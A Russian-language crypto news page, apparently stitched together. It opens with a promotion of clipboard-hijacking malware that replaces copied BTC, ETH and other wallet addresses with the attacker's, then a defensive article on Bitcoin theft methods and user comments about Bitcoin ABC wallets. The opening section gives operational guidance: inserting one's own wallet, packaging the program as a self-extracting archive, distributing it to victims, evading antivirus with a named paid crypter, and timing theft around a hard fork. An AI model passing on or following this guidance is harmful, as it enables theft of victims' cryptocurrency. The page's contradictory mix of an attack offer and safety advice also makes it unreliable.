Как перекачать чужой баланс Биткоин себе

Программа подменяет в буфер обмена кошельки популярных криптовалют на ваши. А учитывая, что адреса подобных кошельков довольно длинные, юзер в большинстве случаев не замечает подмену.
Программа подменяет 6 видов криптовалют —
BTC (Bitcoin), LTC (Litecoin), PPC (Peercoin), NMC (Name Coin), DSH (Dashcoin), ETH (Ethereum). Если какими-то из них не пользуетесь, можно оставить соответствующую строку как есть в файле w.txt. Очередность менять нельзя, как и удалять строчки.
К примеру, если нужна подмена кошельков Bitcoin
Нужно вписать в btc.txt вместо «BTC wallet» номер своего биткоин кошелька.
Посмотрев файл, легко разобраться, куда какой кошель вписывать.

После запуска программа прописывается в автозагрузку всех пользователей, считывает из btc.txt список кошельков, сменяет свой атрибут на скрытый и висит в памяти, ожидая перевода на вышеуказанные кошельки криптовалют, при переводе программа подменит кошелек на ваш.

Кто не знает, как распространять exe вместе c txt можете скачать готовый sfx архив.
Нажимаем правой кнопкой мыши на mgr.sfx.exe и выбираем открыть в winrar, далее открываем btc.txt и вписываем вместо «BTC wallet» номер своего биткоин кошелька.
И распространяете файл как хотите.

ВАЖНО:
Обязательно нажимаем “открыть в winrar”, а не “открыть”, иначе вы запустите программу у себя на компьютере, а удалить ее практически невозможно.

Перед выкладыванием хотел криптануть, но вы же все равно сольете на virustotal, так что выкладываю не криптанутый.

Пароль на архивы btc

Для крипта можете использовать KazyCrypter v5, стоит всего 13$ в месяц.

Примечание:
16 ноября состоится очередной хардфорк биткоина, до 16 числа можно сорвать очень большой куш т.к. многие будут переводить очень крупные суммы на свои локальные кошельки


Блокчейн биткойна защищен невероятно хорошо. Взломать непосредственно сам биткойн на сегодня не удавалось никому. Слабым звеном оказываются сами пользователи и сервисы, которые могут хранить данные кошельков пользователей. Именно такие уязвимости позволяют хакерам присваивать себе миллионы долларов в биткоинах. Сегодня мы поговорим о тех уловках, которые могут использовать хакеры, чтобы завладеть цифровым золотом.

Читайте также:  Почему падает Биткоин в июле

В отличие от локальных кошельков, онлайн-кошельки и биржи криптовалют для авторизации пользователя требуют всего лишь логин и пароль. Правда эту проблему уже решили – появилась двухфакторная аутентификация по смс или звонку. Но как оказалось, даже смс можно перехватить. Для получения доступа к аккаунту в онлайн-кошельке или на бирже криптовалют, мошенникам достаточно получить логин и пароль (в самом простом случае). Получить к ним доступ можно взломав персональный компьютер пользователя. А это задача не самая сложная для опытного хакера. В случае с двухфакторной авторизацией все сложнее. Но опять-таки, опытный специалист при соответствующей мотивации решит эту проблему.

Еще одна опасность – просто «попасть под одну гребенку» из-за взлома онлайн-кошелька или криптобиржи. Их ломают регулярно. Получив доступ к самому ресурсу, хакеры будут выгружать доступы к кошелькам «пачками».

Обезопасить себя просто – двухфакторная авторизация и внимательная работа за ПК или смартфоном. Нужно просто следить за подозрительной работой устройств, замечать лишние процессы в диспетчере задач и не забывать об антивирусах.

Электронные письма со ссылками на поддельные ресурсы – кажется, на эту удочку люди никогда не перестанут клевать. Получаем письмо якобы от администрации биржи, переходим по непонятной ссылке, попадаем на вроде бы похожий сайт… И вот средства со счета уже ушли. Вероятнее всего, пользователь ввел данные авторизации в форму на поддельном сайте.

Как себя обезопасить? Нужно просто быть внимательным. По одному и тому же домену разместить два ресурса не получится. Да и редирект настроить мошенники не смогут. Разница в доменах явно есть, а значит, и заметить ее можно.

Кто-то скажет, что это уже перебор. Но нет, это не перебор. Случайно засветить данные авторизации от кошелька можно очень легко. Онлайн-конференция в Skype с демонстрацией экрана, видео снятое на телефон в неподходящий момент, «случайный зритель» в местном кафе и тому подобные вещи – вот что может раскрыть данные пользователя и лишить его пары тысяч долларов.

Читайте также:  Биткоин фабрика что это

Внимательных людей вокруг много. А во время криптовалютной лихорадки желающих заполучить парочку биткоинов не так уж мало.

Что делать? Работать с криптовалютами там, где никто не будет заглядывать в экран.

Очень часто мошенники просто подменяют адрес получателя криптовалюты. Сделать это можно огромным числом способов. Но решить проблему очень просто – перед отправкой биткоина нужно просто проверить адрес на подлинность и промониторить Google на наличие фактов мошенничества, связанных с этим адресом.

Молодая компания предоставляет свои услуги или проводит ICO. А проект такой перспективный, как же не инвестировать средства? Но когда компания «сливается» становится уже поздно – средства пропали.

Как такое может быть, если компания работает «официально»? Все просто – недостаточное регулирование рынка привело к таким последствиям, как мошеннические ICO, СКАМ и так далее.

Что делать? Внимательно изучать все, что связано с проектом, куда пользователь хочет вложить свои средства. Об этом мы уже написали интересную статью.

Мы перечислили одни из самых распространенных способов кражи BTC. Есть еще масса способов – например, хакеры могут взломать компьютер третьей стороны – сотрудника биржи. Или, например, средства могут выманить с помощью программы-вымогателя.

Резюмируя все вышенаписанное, можно со сто процентной уверенностью сказать – дело помощи утопающим — дело рук самих утопающих. Внимательность, местами чрезмерная подозрительность, способность анализировать информацию и не поддаваться соблазну – вот то, что может спасти держателя биткоина от потери всего, что нажито тяжелым трудом.

  • Подборки новостей один раз в день к вам на Email: Актуальные новости на Email
  • Подборки криптоновостей 1 раз в день в Телеграме : BitExpert
  • Инсайды, прогнозы обсуждения важных тем у нас в Телеграм чате: BitExpert Chat
  • Вся лента криптоновостей журнала BitExpert у вас в Телеграме: BitExpert LIVE
Читайте также:  Когда хардфорк Биткоина

Нашли ошибку в тексте? Выделите ее и нажмите CTRL+ENTER

А вот вопрос! Стоял Bitcoin Core кошелек на компе — все было ок, скачал BitcoinABC — он мне СТЕР мой BTC кошелек и теперь у меня только BCC (кол-во верное, мое). Вопрос — как теперь манипулировать кошельком BTC старым.

Добавлю: установил заново Bitcoin Core в другую папку, запустил — все ок — BTC видны, НО когда пытаюсь запустить одновременно и Core и ABC — ругается что залочен каталог с блокченом, что логично.. и как быть? есть идеи?

А вот вопрос! Стоял Bitcoin Core кошелек на компе — все было ок, скачал BitcoinABC — он мне СТЕР мой BTC кошелек и теперь у меня только BCC (кол-во верное, мое). Вопрос — как теперь манипулировать кошельком BTC старым.

Добавлю: установил заново Bitcoin Core в другую папку, запустил — все ок — BTC видны, НО когда пытаюсь запустить одновременно и Core и ABC — ругается что залочен каталог с блокченом, что логично.. и как быть? есть идеи?

в инструкции английским по белому написано, что нельзя ставить ВСС кошелёк на комп, где живёт ВТС кошелёк. Кроме того, предварительно нужно вывести биткоины, дабы ВСС не потёр их. А уже на кошелёк ВСС подтянуть ключи от кошелька ВТС, на котором уже 0 баланс и оно должно тебе насыпать ВСС в экиваленте, которые были там на момент сегвита.
у электрума есть электрон всс кошелёк
а биткон у абц свой, но толстый

ЗЫ мне ничего не насыпало, я где-то обмудячился вероятно

Читайте далее:

1 Звезда2 Звезды3 Звезды4 Звезды5 Звезд (Пока оценок нет)
Загрузка...
Adblock detector